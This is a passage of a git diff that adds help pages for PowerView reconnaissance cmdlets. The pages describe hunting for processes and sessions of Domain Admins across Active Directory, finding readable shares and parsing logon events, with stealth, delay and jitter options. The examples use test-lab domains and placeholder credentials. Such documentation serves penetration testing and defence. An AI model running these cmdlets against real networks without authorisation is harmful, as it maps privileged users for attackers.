[-ServerTimeLimit ] [-Tombstone] [-Credential ] [-StopOnSuccess] [-Delay ] + [-Jitter ] [-Threads ] +``` + +### TargetProcess +``` +Find-DomainProcess [[-ComputerName] ] [-Domain ] [-ComputerDomain ] + [-ComputerLDAPFilter ] [-ComputerSearchBase ] [-ComputerUnconstrained] + [-ComputerOperatingSystem ] [-ComputerServicePack ] [-ComputerSiteName ] + [-ProcessName ] [-UserGroupIdentity ] [-Server ] [-SearchScope ] + [-ResultPageSize ] [-ServerTimeLimit ] [-Tombstone] [-Credential ] + [-StopOnSuccess] [-Delay ] [-Jitter ] [-Threads ] +``` + +### UserIdentity +``` +Find-DomainProcess [[-ComputerName] ] [-Domain ] [-ComputerDomain ] + [-ComputerLDAPFilter ] [-ComputerSearchBase ] [-ComputerUnconstrained] + [-ComputerOperatingSystem ] [-ComputerServicePack ] [-ComputerSiteName ] + [-UserIdentity ] [-UserGroupIdentity ] [-Server ] [-SearchScope ] + [-ResultPageSize ] [-ServerTimeLimit ] [-Tombstone] [-Credential ] + [-StopOnSuccess] [-Delay ] [-Jitter ] [-Threads ] +``` + +### TargetUser +``` +Find-DomainProcess [[-ComputerName] ] [-Domain ] [-ComputerDomain ] + [-ComputerLDAPFilter ] [-ComputerSearchBase ] [-ComputerUnconstrained] + [-ComputerOperatingSystem ] [-ComputerServicePack ] [-ComputerSiteName ] + [-UserIdentity ] [-UserDomain ] [-UserLDAPFilter ] [-UserSearchBase ] + [-UserGroupIdentity ] [-UserAdminCount] [-Server ] [-SearchScope ] + [-ResultPageSize ] [-ServerTimeLimit ] [-Tombstone] [-Credential ] + [-StopOnSuccess] [-Delay ] [-Jitter ] [-Threads ] +``` + +## DESCRIPTION +This function enumerates all machines on the current (or specified) domain +using Get-DomainComputer, and queries the domain for users of a specified group +(default 'Domain Admins') with Get-DomainGroupMember. +Then for each server the +function enumerates any current processes running with Get-WMIProcess, +searching for processes running under any target user contexts or with the +specified -ProcessName. +If -Credential is passed, it is passed through to +the underlying WMI commands used to enumerate the remote machines. + +## EXAMPLES + +### -------------------------- EXAMPLE 1 -------------------------- +``` +Find-DomainProcess +``` + +Searches for processes run by 'Domain Admins' by enumerating every computer in the domain. + +### -------------------------- EXAMPLE 2 -------------------------- +``` +Find-DomainProcess -UserAdminCount -ComputerOperatingSystem 'Windows 7*' -Domain dev.testlab.local +``` + +Enumerates Windows 7 computers in dev.testlab.local and returns any processes being run by +privileged users in dev.testlab.local. + +### -------------------------- EXAMPLE 3 -------------------------- +``` +Find-DomainProcess -ProcessName putty.exe +``` + +Searchings for instances of putty.exe running on the current domain. + +### -------------------------- EXAMPLE 4 -------------------------- +``` +$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force +``` + +$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword) +Find-DomainProcess -Domain testlab.local -Credential $Cred + +Searches processes being run by 'domain admins' in the testlab.local using the specified alternate credentials. + +## PARAMETERS + +### -ComputerName +Specifies an array of one or more hosts to enumerate, passable on the pipeline. +If -ComputerName is not passed, the default behavior is to enumerate all machines +in the domain returned by Get-DomainComputer. + +```yaml +Type: String[] +Parameter Sets: (All) +Aliases: DNSHostName + +Required: False +Position: 1 +Default value: None +Accept pipeline input: True (ByPropertyName, ByValue) +Accept wildcard characters: False +``` + +### -Domain +Specifies the domain to query for computers AND users, defaults to the current domain. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -ComputerDomain +Specifies the domain to query for computers, defaults to the current domain. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -ComputerLDAPFilter +Specifies an LDAP query string that is used to search for computer objects. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -ComputerSearchBase +Specifies the LDAP source to search through for computers, +e.g. +"LDAP://OU=secret,DC=testlab,DC=local". +Useful for OU queries. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -ComputerUnconstrained +Switch. +Search computer objects that have unconstrained delegation. + +```yaml +Type: SwitchParameter +Parameter Sets: (All) +Aliases: Unconstrained + +Required: False +Position: Named +Default value: False +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -ComputerOperatingSystem +Search computers with a specific operating system, wildcards accepted. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: OperatingSystem + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -ComputerServicePack +Search computers with a specific service pack, wildcards accepted. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: ServicePack + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -ComputerSiteName +Search computers in the specific AD Site name, wildcards accepted. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: SiteName + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -ProcessName +Search for processes with one or more specific names. + +```yaml +Type: String[] +Parameter Sets: TargetProcess +Aliases: + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -UserIdentity +Specifies one or more user identities to search for. + +```yaml +Type: String[] +Parameter Sets: UserIdentity, TargetUser +Aliases: + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -UserDomain +Specifies the domain to query for users to search for, defaults to the current domain. + +```yaml +Type: String +Parameter Sets: TargetUser +Aliases: + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -UserLDAPFilter +Specifies an LDAP query string that is used to search for target users. + +```yaml +Type: String +Parameter Sets: TargetUser +Aliases: + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -UserSearchBase +Specifies the LDAP source to search through for target users. +e.g. +"LDAP://OU=secret,DC=testlab,DC=local". +Useful for OU queries. + +```yaml +Type: String +Parameter Sets: TargetUser +Aliases: + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -UserGroupIdentity +Specifies a group identity to query for target users, defaults to 'Domain Admins. +If any other user specifications are set, then UserGroupIdentity is ignored. + +```yaml +Type: String[] +Parameter Sets: (All) +Aliases: GroupName, Group + +Required: False +Position: Named +Default value: Domain Admins +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -UserAdminCount +Switch. +Search for users users with '(adminCount=1)' (meaning are/were privileged). + +```yaml +Type: SwitchParameter +Parameter Sets: TargetUser +Aliases: AdminCount + +Required: False +Position: Named +Default value: False +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Server +Specifies an Active Directory server (domain controller) to bind to. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: DomainController + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -SearchScope +Specifies the scope to search under for computers, Base/OneLevel/Subtree (default of Subtree). + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: Subtree +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -ResultPageSize +Specifies the PageSize to set for the LDAP searcher object. + +```yaml +Type: Int32 +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: 200 +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -ServerTimeLimit +Specifies the maximum amount of time the server spends searching. +Default of 120 seconds. + +```yaml +Type: Int32 +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: 0 +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Tombstone +Switch. +Specifies that the searcher should also return deleted/tombstoned objects. + +```yaml +Type: SwitchParameter +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: False +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Credential +A \[Management.Automation.PSCredential\] object of alternate credentials +for connection to the target domain and target systems. + +```yaml +Type: PSCredential +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: [Management.Automation.PSCredential]::Empty +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -StopOnSuccess +Switch. +Stop hunting after finding after finding a target user. + +```yaml +Type: SwitchParameter +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: False +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Delay +Specifies the delay (in seconds) between enumerating hosts, defaults to 0. + +```yaml +Type: Int32 +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: 0 +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Jitter +Specifies the jitter (0-1.0) to apply to any specified -Delay, defaults to +/- 0.3 + +```yaml +Type: Double +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: 0.3 +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Threads +The number of threads to use for user searching, defaults to 20. + +```yaml +Type: Int32 +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: 20 +Accept pipeline input: False +Accept wildcard characters: False +``` + +## INPUTS + +## OUTPUTS + +### PowerView.UserProcess + +## NOTES + +## RELATED LINKS + diff --git a/docs/Recon/Find-DomainShare.md b/docs/Recon/Find-DomainShare.md new file mode 100755 index 00000000..71274b7b --- /dev/null +++ b/docs/Recon/Find-DomainShare.md @@ -0,0 +1,335 @@ +# Find-DomainShare + +## SYNOPSIS +Searches for computer shares on the domain. +If -CheckShareAccess is passed, +then only shares the current user has read access to are returned. + +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: Get-DomainComputer, Invoke-UserImpersonation, Invoke-RevertToSelf, Get-NetShare, New-ThreadedFunction + +## SYNTAX + +``` +Find-DomainShare [[-ComputerName] ] [-ComputerDomain ] [-ComputerLDAPFilter ] + [-ComputerSearchBase ] [-ComputerOperatingSystem ] [-ComputerServicePack ] + [-ComputerSiteName ] [-CheckShareAccess] [-Server ] [-SearchScope ] + [-ResultPageSize ] [-ServerTimeLimit ] [-Tombstone] [-Credential ] + [-Delay ] [-Jitter ] [-Threads ] +``` + +## DESCRIPTION +This function enumerates all machines on the current (or specified) domain +using Get-DomainComputer, and enumerates the available shares for each +machine with Get-NetShare. +If -CheckShareAccess is passed, then +\[IO.Directory\]::GetFiles() is used to check if the current user has read +access to the given share. +If -Credential is passed, then +Invoke-UserImpersonation is used to impersonate the specified user before +enumeration, reverting after with Invoke-RevertToSelf. + +## EXAMPLES + +### -------------------------- EXAMPLE 1 -------------------------- +``` +Find-DomainShare +``` + +Find all domain shares in the current domain. + +### -------------------------- EXAMPLE 2 -------------------------- +``` +Find-DomainShare -CheckShareAccess +``` + +Find all domain shares in the current domain that the current user has +read access to. + +### -------------------------- EXAMPLE 3 -------------------------- +``` +$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force +``` + +$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword) +Find-DomainShare -Domain testlab.local -Credential $Cred + +Searches for domain shares in the testlab.local domain using the specified alternate credentials. + +## PARAMETERS + +### -ComputerName +Specifies an array of one or more hosts to enumerate, passable on the pipeline. +If -ComputerName is not passed, the default behavior is to enumerate all machines +in the domain returned by Get-DomainComputer. + +```yaml +Type: String[] +Parameter Sets: (All) +Aliases: DNSHostName + +Required: False +Position: 1 +Default value: None +Accept pipeline input: True (ByPropertyName, ByValue) +Accept wildcard characters: False +``` + +### -ComputerDomain +Specifies the domain to query for computers, defaults to the current domain. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: Domain + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -ComputerLDAPFilter +Specifies an LDAP query string that is used to search for computer objects. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -ComputerSearchBase +Specifies the LDAP source to search through for computers, +e.g. +"LDAP://OU=secret,DC=testlab,DC=local". +Useful for OU queries. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -ComputerOperatingSystem +Search computers with a specific operating system, wildcards accepted. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: OperatingSystem + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -ComputerServicePack +Search computers with a specific service pack, wildcards accepted. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: ServicePack + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -ComputerSiteName +Search computers in the specific AD Site name, wildcards accepted. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: SiteName + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -CheckShareAccess +Switch. +Only display found shares that the local user has access to. + +```yaml +Type: SwitchParameter +Parameter Sets: (All) +Aliases: CheckAccess + +Required: False +Position: Named +Default value: False +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Server +Specifies an Active Directory server (domain controller) to bind to. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: DomainController + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -SearchScope +Specifies the scope to search under for computers, Base/OneLevel/Subtree (default of Subtree). + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: Subtree +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -ResultPageSize +Specifies the PageSize to set for the LDAP searcher object. + +```yaml +Type: Int32 +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: 200 +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -ServerTimeLimit +Specifies the maximum amount of time the server spends searching. +Default of 120 seconds. + +```yaml +Type: Int32 +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: 0 +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Tombstone +Switch. +Specifies that the searcher should also return deleted/tombstoned objects. + +```yaml +Type: SwitchParameter +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: False +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Credential +A \[Management.Automation.PSCredential\] object of alternate credentials +for connection to the target domain and target systems. + +```yaml +Type: PSCredential +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: [Management.Automation.PSCredential]::Empty +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Delay +Specifies the delay (in seconds) between enumerating hosts, defaults to 0. + +```yaml +Type: Int32 +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: 0 +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Jitter +Specifies the jitter (0-1.0) to apply to any specified -Delay, defaults to +/- 0.3 + +```yaml +Type: Double +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: 0.3 +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Threads +The number of threads to use for user searching, defaults to 20. + +```yaml +Type: Int32 +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: 20 +Accept pipeline input: False +Accept wildcard characters: False +``` + +## INPUTS + +## OUTPUTS + +### PowerView.ShareInfo + +## NOTES + +## RELATED LINKS + diff --git a/docs/Recon/Find-DomainUserEvent.md b/docs/Recon/Find-DomainUserEvent.md new file mode 100755 index 00000000..12e64a9e --- /dev/null +++ b/docs/Recon/Find-DomainUserEvent.md @@ -0,0 +1,451 @@ +# Find-DomainUserEvent + +## SYNOPSIS +Finds logon events on the current (or remote domain) for the specified users. + +Author: Lee Christensen (@tifkin_), Justin Warner (@sixdub), Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: Get-DomainUser, Get-DomainGroupMember, Get-DomainController, Get-DomainUserEvent, New-ThreadedFunction + +## SYNTAX + +### Domain (Default) +``` +Find-DomainUserEvent [-Domain ] [-Filter ] [-StartTime ] [-EndTime ] + [-MaxEvents ] [-UserIdentity ] [-UserDomain ] [-UserLDAPFilter ] + [-UserSearchBase ] [-UserGroupIdentity ] [-UserAdminCount] [-CheckAccess] [-Server ] + [-SearchScope ] [-ResultPageSize ] [-ServerTimeLimit ] [-Tombstone] + [-Credential ] [-StopOnSuccess] [-Delay ] [-Jitter ] [-Threads ] +``` + +### ComputerName +``` +Find-DomainUserEvent [[-ComputerName] ] [-Filter ] [-StartTime ] + [-EndTime ] [-MaxEvents ] [-UserIdentity ] [-UserDomain ] + [-UserLDAPFilter ] [-UserSearchBase ] [-UserGroupIdentity ] [-UserAdminCount] + [-CheckAccess] [-Server ] [-SearchScope ] [-ResultPageSize ] [-ServerTimeLimit ] + [-Tombstone] [-Credential ] [-StopOnSuccess] [-Delay ] [-Jitter ] + [-Threads ] +``` + +## DESCRIPTION +Enumerates all domain controllers from the specified -Domain +(default of the local domain) using Get-DomainController, enumerates +the logon events for each using Get-DomainUserEvent, and filters +the results based on the targeting criteria. + +## EXAMPLES + +### -------------------------- EXAMPLE 1 -------------------------- +``` +Find-DomainUserEvent +``` + +Search for any user events matching domain admins on every DC in the current domain. + +### -------------------------- EXAMPLE 2 -------------------------- +``` +$cred = Get-Credential dev\administrator +``` + +Find-DomainUserEvent -ComputerName 'secondary.dev.testlab.local' -UserIdentity 'john' + +Search for any user events matching the user 'john' on the 'secondary.dev.testlab.local' +domain controller using the alternate credential + +### -------------------------- EXAMPLE 3 -------------------------- +``` +'primary.testlab.local | Find-DomainUserEvent -Filter @{'IpAddress'='192.168.52.200|192.168.52.201'} +``` + +Find user events on the primary.testlab.local system where the event matches +the IPAddress '192.168.52.200' or '192.168.52.201'. + +### -------------------------- EXAMPLE 4 -------------------------- +``` +$cred = Get-Credential testlab\administrator +``` + +Find-DomainUserEvent -Delay 1 -Filter @{'LogonGuid'='b8458aa9-b36e-eaa1-96e0-4551000fdb19'; 'TargetLogonId' = '10238128'; 'op'='&'} + +Find user events mathing the specified GUID AND the specified TargetLogonId, searching +through every domain controller in the current domain, enumerating each DC in serial +instead of in a threaded manner, using the alternate credential. + +## PARAMETERS + +### -ComputerName +Specifies an explicit computer name to retrieve events from. + +```yaml +Type: String[] +Parameter Sets: ComputerName +Aliases: dnshostname, HostName, name + +Required: False +Position: 1 +Default value: None +Accept pipeline input: True (ByPropertyName, ByValue) +Accept wildcard characters: False +``` + +### -Domain +Specifies a domain to query for domain controllers to enumerate. +Defaults to the current domain. + +```yaml +Type: String +Parameter Sets: Domain +Aliases: + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Filter +A hashtable of PowerView.LogonEvent properties to filter for. +The 'op|operator|operation' clause can have '&', '|', 'and', or 'or', +and is 'or' by default, meaning at least one clause matches instead of all. +See the exaples for usage. + +```yaml +Type: Hashtable +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -StartTime +The \[DateTime\] object representing the start of when to collect events. +Default of \[DateTime\]::Now.AddDays(-1). + +```yaml +Type: DateTime +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: [DateTime]::Now.AddDays(-1) +Accept pipeline input: True (ByPropertyName) +Accept wildcard characters: False +``` + +### -EndTime +The \[DateTime\] object representing the end of when to collect events. +Default of \[DateTime\]::Now. + +```yaml +Type: DateTime +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: [DateTime]::Now +Accept pipeline input: True (ByPropertyName) +Accept wildcard characters: False +``` + +### -MaxEvents +The maximum number of events (per host) to retrieve. +Default of 5000. + +```yaml +Type: Int32 +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: 5000 +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -UserIdentity +Specifies one or more user identities to search for. + +```yaml +Type: String[] +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -UserDomain +Specifies the domain to query for users to search for, defaults to the current domain. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -UserLDAPFilter +Specifies an LDAP query string that is used to search for target users. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -UserSearchBase +Specifies the LDAP source to search through for target users. +e.g. +"LDAP://OU=secret,DC=testlab,DC=local". +Useful for OU queries. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -UserGroupIdentity +Specifies a group identity to query for target users, defaults to 'Domain Admins. +If any other user specifications are set, then UserGroupIdentity is ignored. + +```yaml +Type: String[] +Parameter Sets: (All) +Aliases: GroupName, Group + +Required: False +Position: Named +Default value: Domain Admins +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -UserAdminCount +Switch. +Search for users users with '(adminCount=1)' (meaning are/were privileged). + +```yaml +Type: SwitchParameter +Parameter Sets: (All) +Aliases: AdminCount + +Required: False +Position: Named +Default value: False +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -CheckAccess +{{Fill CheckAccess Description}} + +```yaml +Type: SwitchParameter +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: False +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Server +Specifies an Active Directory server (domain controller) to bind to. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: DomainController + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -SearchScope +Specifies the scope to search under for computers, Base/OneLevel/Subtree (default of Subtree). + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: Subtree +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -ResultPageSize +Specifies the PageSize to set for the LDAP searcher object. + +```yaml +Type: Int32 +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: 200 +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -ServerTimeLimit +Specifies the maximum amount of time the server spends searching. +Default of 120 seconds. + +```yaml +Type: Int32 +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: 0 +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Tombstone +Switch. +Specifies that the searcher should also return deleted/tombstoned objects. + +```yaml +Type: SwitchParameter +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: False +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Credential +A \[Management.Automation.PSCredential\] object of alternate credentials +for connection to the target computer(s). + +```yaml +Type: PSCredential +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: [Management.Automation.PSCredential]::Empty +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -StopOnSuccess +Switch. +Stop hunting after finding after finding a target user. + +```yaml +Type: SwitchParameter +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: False +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Delay +Specifies the delay (in seconds) between enumerating hosts, defaults to 0. + +```yaml +Type: Int32 +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: 0 +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Jitter +Specifies the jitter (0-1.0) to apply to any specified -Delay, defaults to +/- 0.3 + +```yaml +Type: Double +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: 0.3 +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Threads +The number of threads to use for user searching, defaults to 20. + +```yaml +Type: Int32 +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: 20 +Accept pipeline input: False +Accept wildcard characters: False +``` + +## INPUTS + +## OUTPUTS + +### PowerView.LogonEvent + +PowerView.ExplicitCredentialLogon + +## NOTES + +## RELATED LINKS + +[http://www.sixdub.net/2014/11/07/offensive-event-parsing-bringing-home-trophies/](http://www.sixdub.net/2014/11/07/offensive-event-parsing-bringing-home-trophies/) + diff --git a/docs/Recon/Find-DomainUserLocation.md b/docs/Recon/Find-DomainUserLocation.md new file mode 100755 index 00000000..0d200aa5 --- /dev/null +++ b/docs/Recon/Find-DomainUserLocation.md @@ -0,0 +1,579 @@ +# Find-DomainUserLocation + +## SYNOPSIS +Finds domain machines where specific users are logged into. + +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: Get-DomainFileServer, Get-DomainDFSShare, Get-DomainController, Get-DomainComputer, Get-DomainUser, Get-DomainGroupMember, Invoke-UserImpersonation, Invoke-RevertToSelf, Get-NetSession, Test-AdminAccess, Get-NetLoggedon, Resolve-IPAddress, New-ThreadedFunction + +## SYNTAX + +### UserGroupIdentity (Default) +``` +Find-DomainUserLocation [[-ComputerName] ] [-Domain ] [-ComputerDomain ] + [-ComputerLDAPFilter ] [-ComputerSearchBase ] [-ComputerUnconstrained] + [-ComputerOperatingSystem ] [-ComputerServicePack ] [-ComputerSiteName ] + [-UserDomain ] [-UserLDAPFilter ] [-UserSearchBase ] [-UserGroupIdentity ] + [-UserAdminCount] [-UserAllowDelegation] [-CheckAccess] [-Server ] [-SearchScope ] + [-ResultPageSize ] [-ServerTimeLimit ] [-Tombstone] [-Credential ] + [-StopOnSuccess] [-Delay ] [-Jitter ] [-Stealth] [-StealthSource ] [-Threads ] +``` + +### UserIdentity +``` +Find-DomainUserLocation [[-ComputerName] ] [-Domain ] [-ComputerDomain ] + [-ComputerLDAPFilter ] [-ComputerSearchBase ] [-ComputerUnconstrained] + [-ComputerOperatingSystem ] [-ComputerServicePack ] [-ComputerSiteName ] + [-UserIdentity ] [-UserDomain ] [-UserLDAPFilter ] [-UserSearchBase ] + [-UserAdminCount] [-UserAllowDelegation] [-CheckAccess] [-Server ] [-SearchScope ] + [-ResultPageSize ] [-ServerTimeLimit ] [-Tombstone] [-Credential ] + [-StopOnSuccess] [-Delay ] [-Jitter ] [-Stealth] [-StealthSource ] [-Threads ] +``` + +### ShowAll +``` +Find-DomainUserLocation [[-ComputerName] ] [-Domain ] [-ComputerDomain ] + [-ComputerLDAPFilter ] [-ComputerSearchBase ] [-ComputerUnconstrained] + [-ComputerOperatingSystem ] [-ComputerServicePack ] [-ComputerSiteName ] + [-UserDomain ] [-UserLDAPFilter ] [-UserSearchBase ] [-UserAdminCount] + [-UserAllowDelegation] [-CheckAccess] [-Server ] [-SearchScope ] [-ResultPageSize ] + [-ServerTimeLimit ] [-Tombstone] [-Credential ] [-StopOnSuccess] [-Delay ] + [-Jitter ] [-ShowAll] [-Stealth] [-StealthSource ] [-Threads ] +``` + +## DESCRIPTION +This function enumerates all machines on the current (or specified) domain +using Get-DomainComputer, and queries the domain for users of a specified group +(default 'Domain Admins') with Get-DomainGroupMember. +Then for each server the +function enumerates any active user sessions with Get-NetSession/Get-NetLoggedon +The found user list is compared against the target list, and any matches are +displayed. +If -ShowAll is specified, all results are displayed instead of +the filtered set. +If -Stealth is specified, then likely highly-trafficed servers +are enumerated with Get-DomainFileServer/Get-DomainController, and session +enumeration is executed only against those servers. +If -Credential is passed, +then Invoke-UserImpersonation is used to impersonate the specified user +before enumeration, reverting after with Invoke-RevertToSelf. + +## EXAMPLES + +### -------------------------- EXAMPLE 1 -------------------------- +``` +Find-DomainUserLocation +``` + +Searches for 'Domain Admins' by enumerating every computer in the domain. + +### -------------------------- EXAMPLE 2 -------------------------- +``` +Find-DomainUserLocation -Stealth -ShowAll +``` + +Enumerates likely highly-trafficked servers, performs just session enumeration +against each, and outputs all results. + +### -------------------------- EXAMPLE 3 -------------------------- +``` +Find-DomainUserLocation -UserAdminCount -ComputerOperatingSystem 'Windows 7*' -Domain dev.testlab.local +``` + +Enumerates Windows 7 computers in dev.testlab.local and returns user results for privileged +users in dev.testlab.local. + +### -------------------------- EXAMPLE 4 -------------------------- +``` +$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force +``` + +$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword) +Find-DomainUserLocation -Domain testlab.local -Credential $Cred + +Searches for domain admin locations in the testlab.local using the specified alternate credentials. + +## PARAMETERS + +### -ComputerName +Specifies an array of one or more hosts to enumerate, passable on the pipeline. +If -ComputerName is not passed, the default behavior is to enumerate all machines +in the domain returned by Get-DomainComputer. + +```yaml +Type: String[] +Parameter Sets: (All) +Aliases: DNSHostName + +Required: False +Position: 1 +Default value: None +Accept pipeline input: True (ByPropertyName, ByValue) +Accept wildcard characters: False +``` + +### -Domain +Specifies the domain to query for computers AND users, defaults to the current domain. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -ComputerDomain +Specifies the domain to query for computers, defaults to the current domain. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -ComputerLDAPFilter +Specifies an LDAP query string that is used to search for computer objects. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -ComputerSearchBase +Specifies the LDAP source to search through for computers, +e.g. +"LDAP://OU=secret,DC=testlab,DC=local". +Useful for OU queries. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -ComputerUnconstrained +Switch. +Search computer objects that have unconstrained delegation. + +```yaml +Type: SwitchParameter +Parameter Sets: 